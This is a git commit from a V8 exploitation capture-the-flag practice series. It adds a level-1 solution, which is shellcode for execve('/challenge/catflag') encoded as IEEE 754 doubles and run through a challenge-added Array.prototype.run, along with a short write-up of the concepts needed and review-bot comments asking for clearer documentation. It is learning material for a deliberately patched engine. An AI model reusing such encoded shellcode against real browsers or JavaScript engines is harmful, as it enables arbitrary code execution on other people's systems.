Level 1 of PwnCollegeV8Exploitation

This commit is contained in:
Jack Ren
2024-09-07 10:12:57 +08:00
parent d368897714
commit 409a2d60cd
2 changed files with 23 additions and 0 deletions

@@ -0,0 +1,3 @@
// Machine code of `execve("/challenge/catflag", NULL, NULL)` in its IEEE754 double representation form
let shellcode = [-4.658816580787966e+166, -8.593999715215021e+185, 2.820972645905851e-134, 3.0758087950517603e+180, 2.2354425876138794e+40, 3.68572438550025e+180, 1.0803082663212642e+117, -9.2559631348734e+61];
shellcode.run();
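Review bot: The comment on the first line names the payload but does not record how the eight doubles were derived from the machine-code bytes (which byte order each 8-byte chunk is read in before being reinterpreted as an IEEE 754 double), so the array cannot be regenerated or audited from this file alone. Add a comment stating the conversion used and the length of the encoded code so a reader can verify that the values match the stated `execve("/challenge/catflag", NULL, NULL)` and that no element was mis-rounded when printed.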

@@ -0,0 +1,20 @@
# Level 1
## Problem
Directly execute amd64 machine code by calling `run()` on an array receiver.
The array should have elements kind `PACKED_DOUBLE_ELEMENTS`.
The `run()` is installed on `Array.prototype`.
## Key Knowledge
- [Inheritance and the prototype chain in JavaScript](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Inheritance_and_the_prototype_chain)
- `Receiver` Object
- [How to understand sender and receiver in Ruby?](https://stackoverflow.com/questions/15592268/how-to-understand-sender-and-receiver-in-ruby)
- [Could you explain sender and receiver in OOP and give examples?](https://stackoverflow.com/questions/45474802/could-you-explain-sender-and-receiver-in-oop-and-give-examples)
- [Elements Kinds in V8](https://v8.dev/blog/elements-kinds)
- IEEE754 Standard
- Conversion between double & int64 representation using IEEE754
- ShellCode
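Review bot: The Problem section should state that `run()` on `Array.prototype` is a builtin added by this challenge's patched V8 and not part of standard JavaScript; as written a reader could take it for a normal method. In Key Knowledge, the two links under `Receiver` Object explain receivers in Ruby and generic OOP rather than how a V8 builtin receives its `this` array, so either note that they are only for the concept or link V8-specific material; also use "IEEE 754" and "Shellcode" consistently with the rest of the notes.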